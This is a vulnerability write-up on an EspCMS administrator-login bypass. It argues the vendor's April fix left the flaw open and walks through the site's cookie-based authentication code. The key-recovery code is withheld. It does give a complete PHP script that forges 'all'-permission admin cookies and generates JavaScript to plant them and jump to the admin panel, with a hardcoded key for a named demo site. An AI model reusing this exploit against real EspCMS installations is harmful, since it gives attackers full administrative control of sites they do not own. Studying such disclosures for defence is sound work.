EspCMS background login Bypass Vulnerability Reuse

Source: Internet
Author: User

On April 13 I submitted a report to the 360 vulnerability platform and provided a tool to calculate db_pscode. db_pscode is a string constant that is randomly generated during installation and saved in the configuration file. On April 22 the vendor officially released a new version that changed the way db_pscode is generated during installation and "fixed" the vulnerability. In fact, the vendor only defended against the exploit of that time and did not fundamentally close the vulnerability. Before the 22nd, db_pscode was a 32-character MD5 hash string; after the change its length can be anywhere from 1 to 39 characters, but it can still be reversed, so the vulnerability can still be used to bypass the server-side check. Let's take a look at the constructor of the `important` class on the main interface of the EspCMS background verification flow:

```php
<?php
// adminsoft/management.php
class important extends connector {
    function important() {
        // The constructor calls softbase() in the parent class; softbase()
        // calls admin_purview() to verify the login state.
        $this->softbase(true);
    }
}

// public/class_connector.php -- softbase() in the parent class connector
class connector {
    function softbase($admin_purview = false) {
        header("Content-Type: text/html; charset=UTF-8");
        $this->dbmysql();
        $this->commandinc();
        $this->systemfile();
        $this->Cachedb();
        if ($admin_purview) {
            $this->admin_purview(); // check whether the administrator has logged on
            $this->sitelng = $this->getlng();
            $action = $this->fun->accept('action', 'R');
            if (!in_array($action, $this->esp_powerlist) && !in_array('all', $this->esp_powerlist)) {
                // $this->esp_powerlist is the permission list; a list containing 'all' passes everything
                exit('permissions errors');
            }
        }
        // .....
    }

    // public/class_connector.php
    function admin_purview() {
        if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') {
            $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G');
            $esp_powerlist   = $this->fun->accept('esp_powerlist', 'G');
            $gettype = false;
        } else {
            $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
            $esp_powerlist   = $this->fun->accept('esp_powerlist', 'C');
            $gettype = true;
            // Both values can come either from the cookie or from GET parameters.
            // We use the cookie path: it is less visible, and the values persist.
            // $esp_powerlist is the permission list; decoding to 'all' means an
            // administrator with every permission. $ecisp_admininfo holds the
            // administrator's details.
        }
        // db_pscode is the decryption key. Once it is known, $ecisp_admininfo can be
        // constructed by us, which in turn controls $arr_purview and $this->esp_powerlist.
        $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'decode', db_pscode));
        $this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'decode', db_pscode));
        // Plaintext layout, e.g.:
        // "1|c4rp3nt3r|12345678901234567890123456789012|" . md5('Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/100') .
        // "|1|management|" . md5('http://scan.hackme.info/espcms/adminsoft/')
        list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent,
             $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview;

        if ($gettype) {
            // Parameters submitted via cookie enter here. As soon as the conditions below
            // yield $condition = 1, administrator authentication has passed.
            // The problem: none of this data is checked against the database again
            // (if it were, that check would probably be SQL-injectable :)
            // We construct $this->esp_username = 'c4rp3nt3r', $this->esp_adminuserid = '1',
            // and $this->esp_softurl / $this->esp_useragent as the expected md5 values.
            if (empty($this->esp_username) || empty($this->esp_adminuserid)
                || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) {
                $condition = 0;
            } else {
                $condition = 1;
            }
        } else {
            if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) {
                $condition = 0;
            } else {
                $condition = 1;
            }
        }

        if ($condition == 0) {
            if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {
                header('location: index.php?archive=adminuser&action=login');
                exit();
            }
        } else {
            // administrator verification has passed :-)
            if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == ''
                && $this->fun->accept('action', 'R') == '') {
                header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter');
                exit();
            }
        }
    }
}
```


The key point here is $this->fun->eccode(): its decryption key db_pscode can be recovered by comparing a known plaintext with its ciphertext. To avoid unnecessary misunderstanding and trouble, the specific code for calculating db_pscode is not provided here; the method in outline: because the user agent and the site root URL are known, more than 66 characters of the plaintext are known, which is enough to reverse the key. After 0422, if db_pscode is no more than 32 characters, the 32-character verification code can also be obtained by having a verification email sent elsewhere. There are many methods. The following PHP generates the JavaScript used to bypass the background login:
```php
<?php
// code by c4rp3nt3r@0x50sec.org
$admin_AGENT = $_SERVER['HTTP_USER_AGENT'];
//////////////////////////////////////////////////
$admin_ClassURL = 'http://demo.ecisp.cn/adminsoft';
$key = "b229c152dsafsdafasfsadfasfdsfcbda220a9c5"; // db_pscode of http://demo.ecisp.cn (20130425)
//////////////////////////////////////////////////
$powerlist = 'all';
$admininfo = '1|espcmsadmin|cccccccccccccccccccccccccccccccc|' . md5($admin_AGENT) . '|1|1|' . md5($admin_ClassURL);
$esp_powerlist   = eccode($powerlist, 'encode', $key);
$ecisp_admininfo = eccode($admininfo, 'encode', $key);

$exploit  = "document.cookie = 'esp_powerlist=$esp_powerlist';\n";
$exploit .= "document.cookie = 'ecisp_admininfo=$ecisp_admininfo';\n";
$exploit .= "// alert(document.cookie);\n";
$exploit .= "window.location.href = '" . $admin_ClassURL . "/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter';\n";
echo "<pre>" . $exploit . "</pre>";

// EspCMS's own eccode(): a per-character additive cipher over the cycled key,
// then URL-safe base64. Ciphertext minus plaintext gives the key byte by byte.
function eccode($string, $operation = 'decode', $key = '@LFK24s224%@safS3s%1f%') {
    $result = '';
    // echo '^' . $key . "^\n";
    if ($operation == 'encode') {
        for ($i = 0; $i < strlen($string); $i++) {
            $char    = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char    = chr(ord($char) + ord($keychar));
            $result .= $char;
        }
        $result = base64_encode($result);
        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
    } elseif ($operation == 'decode') {
        $data = str_replace(array('-', '_'), array('+', '/'), $string);
        $mod4 = strlen($data) % 4;
        if ($mod4) {
            $data .= substr('====', $mod4);
        }
        $string = base64_decode($data);
        for ($i = 0; $i < strlen($string); $i++) {
            $char    = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char    = chr(ord($char) - ord($keychar));
            $result .= $char;
        }
    }
    return $result;
}
```
